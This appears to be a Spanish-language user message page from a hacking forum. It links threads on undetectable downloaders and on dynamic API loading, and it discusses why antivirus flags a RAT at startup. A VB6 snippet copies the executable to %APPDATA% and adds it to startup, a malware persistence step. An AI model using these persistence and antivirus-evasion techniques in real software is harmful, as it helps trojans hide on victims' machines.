Aprovecho para apuntar que base64 no es un cifrado sino una codificación.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitarhttp://foro.elhacker.net/analisis_y_diseno_de_malware/srcvb6_downloader_fud_d-t290080.0.html
http://foro.elhacker.net/programacion_vb/asmvb6invoke_llamas_apis_sin_declararlas_kinvokebas-t290072.0.html
http://foro.elhacker.net/programacion_visual_basic/vb6snippet_mapipatchbyid_carga_apis_dinamicamente_late_binding-t325473.0.html
Cita de: Tr0Y4N0 en 9 Diciembre 2012, 01:29 AMSuponiendo que te refieres a que el AV salta al ejecutar el malware:
Me pilla el AVG al iniciar el RAT al arranque.
Private Sub Form_Load()
Dim sPath As String
Dim sDest As String
sPath = App.Path & "\" & App.EXEName & ".exe"
sDest = Environ("APPDATA") & "\Test.exe"
MsgBox "Surprise"
FileCopy sPath, sDest
MsgBox "Modafoca"
If PutOnStartUp(sDest) Then
Me.BackColor = vbGreen
Else
Me.BackColor = vbRed
End If
Me.AutoRedraw = True
Me.Print sPath
Me.Print sDest
End Sub